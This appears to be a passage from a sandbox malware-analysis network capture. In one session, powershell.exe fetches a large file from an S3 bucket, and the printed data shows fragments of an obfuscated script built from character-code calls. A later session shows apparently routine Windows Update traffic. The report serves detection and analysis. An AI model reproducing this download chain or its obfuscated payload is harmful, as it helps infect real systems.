6f 6d 2f 70 6b 69 2f 63 65 72 74 73 2f 4d 69 63 54 69 6d 53 74 61 50 43 41 5f 32 30 31 30 2d 30 37 2d 30 31 2e 63 72 74 30 0c 06 Data Ascii: 00Uvh)Ot%\|}0U#0c:\1C{\|F3hZmU0VUO0M0KIGEhttp://crl.microsoft.com/pki/crl/products/MicTimStaPCA_2010-07-01.crl0Z+N0L0J+0>http://www.microsoft.com/pki/certs/MicTimStaPCA_2010-07-01.crt0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49709	16.12.65.210	443	6452	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2025-05-22 12:02:41 UTC	197	OUT	GET /CMiEZso HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: ld-cxhaspe-20-05-p.s3.us-east-2.amazonaws.com Connection: Keep-Alive
2025-05-22 12:02:41 UTC	413	IN	HTTP/1.1 200 OK x-amz-id-2: 7YS5hIasnCCr+GAx5l8S7XxLoOYXUcuHDdR0TehL+FgomhYKshN9sshQB1YnUi6OY6VSkIcn664= x-amz-request-id: HJBK7FC59P8QKDTG Date: Thu, 22 May 2025 12:02:42 GMT Last-Modified: Mon, 19 May 2025 21:39:33 GMT ETag: "ad0c0ed37d08e1dc3dfd9aa4cbefafbc" x-amz-server-side-encryption: AES256 Accept-Ranges: bytes Content-Type: application/octet-stream Content-Length: 2917563 Server: AmazonS3
2025-05-22 12:02:41 UTC	1460	IN	Data Raw: 0d 0a 4b 53 61 4a 6e 78 5a 46 52 62 65 61 49 42 7a 51 41 77 6f 51 78 74 49 58 52 57 56 73 42 62 70 68 59 68 78 44 45 71 76 20 3d 20 73 48 6a 47 6e 6e 79 30 28 38 32 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 37 31 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 39 39 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 38 38 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 37 35 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 36 37 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 39 38 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 31 30 34 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 31 30 36 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 37 38 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 31 30 39 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 31 31 35 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 38 33 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 31 30 32 Data Ascii: KSaJnxZFRbeaIBzQAwoQxtIXRWVsBbphYhxDEqv = sHjGnny0(82) + sHjGnny0(71) + sHjGnny0(99) + sHjGnny0(88) + sHjGnny0(75) + sHjGnny0(67) + sHjGnny0(98) + sHjGnny0(104) + sHjGnny0(106) + sHjGnny0(78) + sHjGnny0(109) + sHjGnny0(115) + sHjGnny0(83) + sHjGnny0(102
2025-05-22 12:02:41 UTC	1460	IN	Data Raw: 6a 47 6e 6e 79 30 28 31 31 34 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 38 30 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 39 39 29 0d 0a 42 4a 58 46 49 70 69 76 6b 53 7a 56 78 51 45 59 74 70 72 67 69 44 47 70 78 79 6d 6d 68 55 55 42 56 55 79 56 75 61 55 20 3d 20 73 48 6a 47 6e 6e 79 30 28 38 31 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 37 36 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 37 37 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 31 30 31 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 38 35 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 31 30 38 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 37 39 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 31 31 30 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 39 39 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 36 35 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 31 30 30 29 20 2b 20 73 Data Ascii: jGnny0(114) + sHjGnny0(80) + sHjGnny0(99)BJXFIpivkSzVxQEYtprgiDGpxymmhUUBVUyVuaU = sHjGnny0(81) + sHjGnny0(76) + sHjGnny0(77) + sHjGnny0(101) + sHjGnny0(85) + sHjGnny0(108) + sHjGnny0(79) + sHjGnny0(110) + sHjGnny0(99) + sHjGnny0(65) + sHjGnny0(100) + s
2025-05-22 12:02:41 UTC	1460	IN	Data Raw: 31 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 31 30 39 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 31 30 31 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 39 30 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 31 31 37 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 31 30 35 29 0d 0a 51 66 6f 6f 6c 45 48 66 41 73 5a 4e 6c 48 61 45 67 44 71 70 6c 54 5a 6a 68 42 50 75 4e 47 4a 68 46 5a 67 59 46 47 6d 20 3d 20 73 48 6a 47 6e 6e 79 30 28 39 30 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 39 37 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 37 34 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 37 34 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 31 31 34 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 38 32 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 31 30 30 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 37 32 29 20 2b 20 73 48 6a 47 6e 6e 79 30 Data Ascii: 1) + sHjGnny0(109) + sHjGnny0(101) + sHjGnny0(90) + sHjGnny0(117) + sHjGnny0(105)QfoolEHfAsZNlHaEgDqplTZjhBPuNGJhFZgYFGm = sHjGnny0(90) + sHjGnny0(97) + sHjGnny0(74) + sHjGnny0(74) + sHjGnny0(114) + sHjGnny0(82) + sHjGnny0(100) + sHjGnny0(72) + sHjGnny0
2025-05-22 12:02:41 UTC	1460	IN	Data Raw: 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 31 30 33 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 37 31 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 36 39 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 31 31 36 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 38 33 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 37 32 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 31 32 30 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 31 32 32 29 0d 0a 53 75 56 54 4a 5a 57 4f 6b 50 6b 61 52 4e 4a 46 6e 64 44 6c 70 4c 68 41 6f 6d 66 44 6d 77 4b 4b 79 5a 4d 69 69 46 4b 20 3d 20 73 48 6a 47 6e 6e 79 30 28 31 30 36 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 37 34 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 31 31 32 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 31 32 31 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 37 33 29 20 2b 20 73 48 6a 47 6e 6e 79 30 Data Ascii: ) + sHjGnny0(103) + sHjGnny0(71) + sHjGnny0(69) + sHjGnny0(116) + sHjGnny0(83) + sHjGnny0(72) + sHjGnny0(120) + sHjGnny0(122)SuVTJZWOkPkaRNJFndDlpLhAomfDmwKKyZMiiFK = sHjGnny0(106) + sHjGnny0(74) + sHjGnny0(112) + sHjGnny0(121) + sHjGnny0(73) + sHjGnny0
2025-05-22 12:02:41 UTC	1460	IN	Data Raw: 73 48 6a 47 6e 6e 79 30 28 31 30 34 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 31 32 32 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 31 31 33 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 31 30 35 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 37 32 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 38 39 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 31 30 37 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 37 33 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 31 31 38 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 31 30 33 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 38 35 29 0d 0a 55 41 6b 42 45 63 6d 41 49 4c 47 54 59 46 79 58 57 55 73 6a 63 57 44 6b 6a 56 51 72 72 68 50 45 53 41 6a 6f 56 6b 41 20 3d 20 73 48 6a 47 6e 6e 79 30 28 31 30 37 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 31 30 31 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 37 Data Ascii: sHjGnny0(104) + sHjGnny0(122) + sHjGnny0(113) + sHjGnny0(105) + sHjGnny0(72) + sHjGnny0(89) + sHjGnny0(107) + sHjGnny0(73) + sHjGnny0(118) + sHjGnny0(103) + sHjGnny0(85)UAkBEcmAILGTYFyXWUsjcWDkjVQrrhPESAjoVkA = sHjGnny0(107) + sHjGnny0(101) + sHjGnny0(7
2025-05-22 12:02:41 UTC	1460	IN	Data Raw: 20 73 48 6a 47 6e 6e 79 30 28 38 37 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 31 31 36 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 31 31 36 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 31 30 36 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 36 36 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 37 39 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 31 31 34 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 38 33 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 37 35 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 37 36 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 38 39 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 31 30 32 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 38 37 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 31 31 39 29 0d 0a 6f 4b 51 4c 4b 50 65 77 55 4e 61 57 4e 57 77 69 6f 44 75 76 6c 6b 43 69 74 6f 64 47 75 41 62 71 63 43 76 65 49 5a 48 Data Ascii: sHjGnny0(87) + sHjGnny0(116) + sHjGnny0(116) + sHjGnny0(106) + sHjGnny0(66) + sHjGnny0(79) + sHjGnny0(114) + sHjGnny0(83) + sHjGnny0(75) + sHjGnny0(76) + sHjGnny0(89) + sHjGnny0(102) + sHjGnny0(87) + sHjGnny0(119)oKQLKPewUNaWNWwioDuvlkCitodGuAbqcCveIZH
2025-05-22 12:02:41 UTC	1460	IN	Data Raw: 6a 47 6e 6e 79 30 28 37 38 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 31 30 35 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 37 36 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 37 37 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 39 38 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 31 31 30 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 37 38 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 37 35 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 38 32 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 36 35 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 39 38 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 31 30 39 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 31 30 33 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 38 34 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 31 32 30 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 31 31 38 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 31 32 Data Ascii: jGnny0(78) + sHjGnny0(105) + sHjGnny0(76) + sHjGnny0(77) + sHjGnny0(98) + sHjGnny0(110) + sHjGnny0(78) + sHjGnny0(75) + sHjGnny0(82) + sHjGnny0(65) + sHjGnny0(98) + sHjGnny0(109) + sHjGnny0(103) + sHjGnny0(84) + sHjGnny0(120) + sHjGnny0(118) + sHjGnny0(12
2025-05-22 12:02:41 UTC	1460	IN	Data Raw: 37 36 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 31 31 34 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 31 31 31 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 37 36 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 31 31 34 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 36 35 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 36 36 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 36 39 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 31 32 32 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 31 30 34 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 36 37 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 37 36 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 31 30 38 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 31 30 31 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 37 31 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 31 30 37 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 38 31 29 20 2b 20 73 Data Ascii: 76) + sHjGnny0(114) + sHjGnny0(111) + sHjGnny0(76) + sHjGnny0(114) + sHjGnny0(65) + sHjGnny0(66) + sHjGnny0(69) + sHjGnny0(122) + sHjGnny0(104) + sHjGnny0(67) + sHjGnny0(76) + sHjGnny0(108) + sHjGnny0(101) + sHjGnny0(71) + sHjGnny0(107) + sHjGnny0(81) + s
2025-05-22 12:02:41 UTC	1460	IN	Data Raw: 47 6e 6e 79 30 28 31 31 38 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 37 32 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 36 37 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 38 33 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 39 37 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 31 32 30 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 31 31 35 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 37 34 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 37 31 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 36 36 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 38 38 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 31 30 34 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 31 31 35 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 37 36 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 31 30 35 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 31 31 39 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 36 38 Data Ascii: Gnny0(118) + sHjGnny0(72) + sHjGnny0(67) + sHjGnny0(83) + sHjGnny0(97) + sHjGnny0(120) + sHjGnny0(115) + sHjGnny0(74) + sHjGnny0(71) + sHjGnny0(66) + sHjGnny0(88) + sHjGnny0(104) + sHjGnny0(115) + sHjGnny0(76) + sHjGnny0(105) + sHjGnny0(119) + sHjGnny0(68
2025-05-22 12:02:41 UTC	1460	IN	Data Raw: 38 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 31 30 34 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 31 30 33 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 37 32 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 38 37 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 31 30 33 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 31 31 35 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 31 31 32 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 38 34 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 37 36 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 38 34 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 31 31 34 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 31 30 30 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 31 32 31 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 38 35 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 37 35 29 20 2b 20 73 48 6a 47 6e 6e 79 30 28 31 32 31 29 20 2b 20 73 Data Ascii: 8) + sHjGnny0(104) + sHjGnny0(103) + sHjGnny0(72) + sHjGnny0(87) + sHjGnny0(103) + sHjGnny0(115) + sHjGnny0(112) + sHjGnny0(84) + sHjGnny0(76) + sHjGnny0(84) + sHjGnny0(114) + sHjGnny0(100) + sHjGnny0(121) + sHjGnny0(85) + sHjGnny0(75) + sHjGnny0(121) + s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49710	20.109.210.53	443

Timestamp	Bytes transferred	Direction	Data
2025-05-22 12:03:07 UTC	309	OUT	GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=3uhgp7HwPtu4Azk&MD=BZfkGB+b HTTP/1.1 host: slscr.update.microsoft.com accept: / user-agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 accept-encoding: identity
2025-05-22 12:03:07 UTC	558	IN	HTTP/1.1 200 OK content-type: application/octet-stream date: Thu, 22 May 2025 12:03:07 GMT cache-control: no-cache etag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440" expires: -1 last-modified: Mon, 01 Jan 0001 00:00:00 GMT pragma: no-cache content-length: 30005 slsversion: 2.0 ms-correlationid: cc585f6e-a0fd-4d8f-9172-8afead6e5e08 ms-requestid: 9e74f760-b945-4215-a6f7-bcaab9749a16 ms-cv: XdPCepDrDkOWZoqU.0 x-content-type-options: nosniff x-microsoft-slsclientcache: 1440 content-disposition: attachment; filename=environment.cab
2025-05-22 12:03:07 UTC	1460	IN	Data Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK\|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
2025-05-22 12:03:07 UTC	1460	IN	Data Raw: 25 dc 93 6a 9f d2 e0 c1 ea a0 79 31 c4 ab 34 9c e1 43 a8 b3 7e 55 3a 43 6e 5b 8c bc 1c ac b5 c5 db f6 d5 6b 9a 98 b7 61 91 ec 20 ed 8b 6b 6b 17 65 25 d4 6a aa b6 ca 84 bd 36 98 48 0e 5e cd 7c b0 80 4f 8a 29 1a bd 79 0a 95 15 94 2c 8d 46 d3 90 66 2a a1 20 71 50 9b 63 14 ba 66 53 25 93 57 c9 de 70 e3 0a f9 95 e5 f6 30 46 8b 99 e7 52 08 31 34 2a fb 7b 19 1f 7d d2 b0 1d 12 db 90 d7 13 2b 94 d3 2c 24 3c da 5c c7 eb 72 6a b9 b9 58 16 5c 90 d7 e5 cd 92 95 32 0d 6b cf 04 8d 4e 78 08 6b 05 10 2b 3f 35 f1 9b 05 cf 25 b3 f8 b8 80 45 47 a6 3f 98 fb 9d 6d bb 59 60 bf 35 2a 6a 71 da 05 32 46 9c 40 06 81 a2 d0 24 13 09 4e 44 ad c8 6d e0 34 6a 19 a9 18 60 e4 00 e9 b7 1d ae 08 07 c3 31 50 c7 68 68 e8 50 28 40 75 d8 01 17 46 0a 23 66 bd 70 60 ba 6d fe d2 9a c3 39 9c fb a0 Data Ascii: %jy14C~U:Cn[ka kke%j6H^\|O)y,Ff* qPcfS%Wp0FR14{}+,$<\rjX\2kNxk+?5%EG?mY`5jq2F@$NDm4j`1PhhP(@uF#fp`m9
2025-05-22 12:03:07 UTC	1460	IN	Data Raw: 88 13 d2 ca b4 06 b4 39 d4 f9 dc 75 86 ec f8 71 28 61 7c 4c c7 63 c8 ea 15 e7 75 7d 6d 29 70 2a 71 c0 e4 ec e9 97 37 59 2c ef da 63 ae b1 f3 e5 0b 3b cf df 39 d7 39 fa 82 03 6e ce 5d df 9a 7e b1 21 8c f5 e5 b9 a1 86 fb 42 cd 8f 80 65 85 b7 9b da 6d 66 ca ea e3 34 46 3b 0d 3a b7 43 5e 3d 7a 57 67 f5 fc 5c 06 83 b4 c2 d8 63 75 21 29 ed dd c1 86 8d 5d 43 f3 49 fd 3d 76 02 f5 6a 5c 57 4b 0c 0f 16 4c dc ae 2c 6b d6 f7 77 f2 a8 5d 45 e3 67 7b 15 83 04 9a 73 32 62 e8 67 d8 7e c1 4c 27 14 66 da 01 f8 70 cc af 50 49 02 86 a1 cc 11 74 0c 24 7f 15 ad 28 be 9d 40 0c 81 9d a0 c6 02 69 80 3c 40 a6 20 29 90 04 80 7d 78 26 1e ec 70 98 20 80 f0 1b 08 60 00 70 d4 d7 e1 d0 c7 a1 d0 95 43 18 82 b8 25 55 45 8c a6 3c b1 98 db 86 78 7d 26 94 17 d0 3b 82 42 0d 40 0d 50 49 53 4a Data Ascii: 9uq(a\|Lcu}m)p*q7Y,c;99n]~!Bemf4F;:C^=zWg\cu!)]CI=vj\WKL,kw]Eg{s2bg~L'fpPIt$(@i<@ )}x&p `pC%UE<x}&;B@PISJ
2025-05-22 12:03:07 UTC	1460	IN	Data Raw: 9e 4c 48 88 5f 1b 99 a2 79 07 02 1f 96 7e 0e 91 7d ff 94 85 f8 7a 67 50 22 aa 5f 9d b1 ea a1 e7 40 3d e0 af d4 09 80 e0 46 08 01 02 dc 7c 87 51 31 df 61 b4 fc b5 f8 5f f9 9c 7e 37 d4 2e 33 2b bb ab b5 2d 61 e9 d4 86 25 79 97 ff 9e 60 01 ae e6 85 4f 0d 70 27 cb 1c ca cd c6 bb 4c ee e3 f1 e7 bd 04 1a c4 ed 5f ae e6 74 15 34 ce df 79 d8 bc c2 5b 3a 92 70 aa 60 87 34 ac 37 4f 07 1b c3 55 5a 75 15 93 ac 8f 49 e2 e4 eb 89 76 36 16 f0 83 b7 d5 bb 9f 67 2f 58 2c 57 77 4a 51 b7 7d ea c5 74 6c 12 68 7c 96 77 f7 76 81 a8 ad 31 99 b2 9b a5 fe 82 2e a8 87 5d 00 c3 8c c5 2b de 55 90 4a db 4b 20 93 f0 89 59 6d 27 da 83 c9 06 97 5b cf e2 8c 3a da b1 f1 9f 15 df ae f8 48 9f 72 16 a2 76 86 7d ce 3a 98 57 9f df 1b d0 21 92 e5 7e 21 70 a6 89 08 f9 40 7b 4f 81 e4 ad 37 f1 88 Data Ascii: LH_y~}zgP"_@=F\|Q1a_~7.3+-a%y`Op'L_t4y[:p`47OUZuIv6g/X,WwJQ}tlh\|wv1.]+UJK Ym'[:Hrv}:W!~!p@{O7
2025-05-22 12:03:07 UTC	1460	IN	Data Raw: ec 5b ba a1 ad f4 7e b4 36 22 6b 2a 3a ea b1 10 bb 5a d2 82 b3 0d ce 73 7e 0e e7 48 44 3b 1f 73 dd 54 69 30 7d cb f8 b3 28 bf 32 cd a8 91 6d 34 ad bb 0e d6 22 89 e7 eb 96 b3 8a bc 59 04 0a 5e bc 0b 94 99 3b ef f8 9c bb b7 31 08 30 50 61 9f 34 7d fc aa 6a 32 22 64 fa 76 01 58 be a6 de 25 8f 4c df ca 78 6c 2b 26 9a 9a 4a 74 8f a6 d3 ed aa 44 e2 79 8f 57 ad 97 78 47 09 43 fb f6 b2 69 ae fa ed 0e a6 c8 bc 2d 77 e5 1a be 7a c9 bf 7a 38 df 8f 7f 89 5f 71 93 cd f1 3e a1 da 7c 03 1a 34 f3 b5 5b 8e 92 80 7b dc 29 5e 24 de 2a fe 87 0a 59 f2 e5 dc f9 04 df 73 8a c3 c5 46 cd eb bd 03 6e a2 52 ca 4d 3c 42 8a 91 90 5a 49 6b 4e fc c5 eb 6a e7 27 5f d7 d9 92 eb 99 80 dd 9e 5b 65 18 f5 33 5f 86 4c f2 90 bb f6 e7 d2 ac 36 6f 13 62 f5 9b 39 9d 78 c6 6f 1e a6 9f 96 13 48 6b Data Ascii: [~6"k:Zs~HD;sTi0}(2m4"Y^;10Pa4}j2"dvX%Lxl+&JtDyWxGCi-wzz8_q>\|4[{)^$YsFnRM<BZIkNj'_[e3_L6ob9xoHk
2025-05-22 12:03:07 UTC	1460	IN	Data Raw: e0 22 b7 3c 63 7a e6 a3 86 23 e7 30 2c a5 42 31 a2 ae 1d 00 01 77 ff 02 a6 f0 eb 0b 87 ba f9 f4 b0 9c 8b e6 cf 6e 16 c7 b8 4c f1 8c b4 47 9e 54 c6 be 45 47 91 4e 78 c0 25 c3 da 17 f4 70 5a ff 27 b0 83 21 21 a0 e4 ae fa e7 11 5b d1 a2 1b 58 46 ba 4f bb ee 07 59 6e f4 ab 0a 81 03 c1 db 6d e1 39 50 02 d9 13 3a ab 49 21 bc e7 4b f7 77 6a 95 6b 49 fb ce 2e 4c aa 8c 55 4e a9 ed f2 4b ba 33 65 99 89 da 5f 69 11 cd d0 da 26 9d ba bf 75 33 7c 68 ce 52 23 f7 6e bc 71 bd c0 f4 4c 0b 5d 99 f0 e8 ca 66 97 be 7a a9 35 72 a3 de 49 98 95 65 3a c9 e6 ee 0c cd 45 69 a7 49 e7 1e fb 4f 4f 15 f7 a3 06 9f 47 bd ab 57 ad de 78 c8 98 dc 16 dc f3 dc dc 55 83 32 68 7c fe e1 8e ea 62 90 73 ac a2 96 77 af 48 45 bf 78 17 b3 09 a7 a0 ca 83 66 1e 5a d1 e5 90 4f 7e a6 0b 01 21 3a 95 a5 Data Ascii: "<cz#0,B1wnLGTEGNx%pZ'!![XFOYnm9P:I!KwjkI.LUNK3e_i&u3\|hR#nqL]fz5rIe:EiIOOGWxU2h\|bswHExfZO~!:
2025-05-22 12:03:07 UTC	1460	IN	Data Raw: 32 1b 0a 18 02 7a 78 07 ff b7 e4 2c d8 df 5c 0f 2a b6 bb 00 9c 87 d0 82 ba 63 31 84 2a c7 46 98 eb 69 7b ca ce 9c e6 4a 57 82 55 9d 16 93 e4 b5 57 d0 fa 9c 13 8a fb e0 26 aa cb 42 66 b1 8c b9 47 81 8f 78 e3 fb 48 3f d3 f1 e2 b2 3b da 37 b9 e7 72 09 2f 28 74 c5 3e 08 59 00 a5 23 c9 e2 00 24 d9 ad 9f 24 21 fe a8 3a df 1f 25 21 0e a8 2a 9b 7f 22 09 51 ff 59 12 22 01 43 82 45 51 0d 42 bf 2f 09 89 de 9f 4c c9 db 61 c0 ef 3e d3 70 fe f1 53 0b 5c 79 ac ed 1b 14 3c 55 e6 4d a6 39 95 45 ed 70 7c 08 dc 92 bb c1 42 6b e0 27 49 08 37 a7 00 02 f1 4d 12 f2 3a 2b a0 03 08 78 f1 a7 6c c7 af 6c 11 f6 71 b6 48 c2 c1 c2 15 65 9e c7 e2 24 04 13 c0 70 d4 8d da 51 c3 da c6 c2 de fc 1b fb 24 28 0d 00 1c 00 9f 0c c0 21 2d c4 2b f0 af 6b 41 16 01 24 3a 0d 80 44 c3 38 a6 05 59 7f Data Ascii: 2zx,\c1Fi{JWUW&BfGxH?;7r/(t>Y#$$!:%!*"QY"CEQB/La>pS\y<UM9Ep\|Bk'I7M:+xllqHe$pQ$(!-+kA$:D8Y
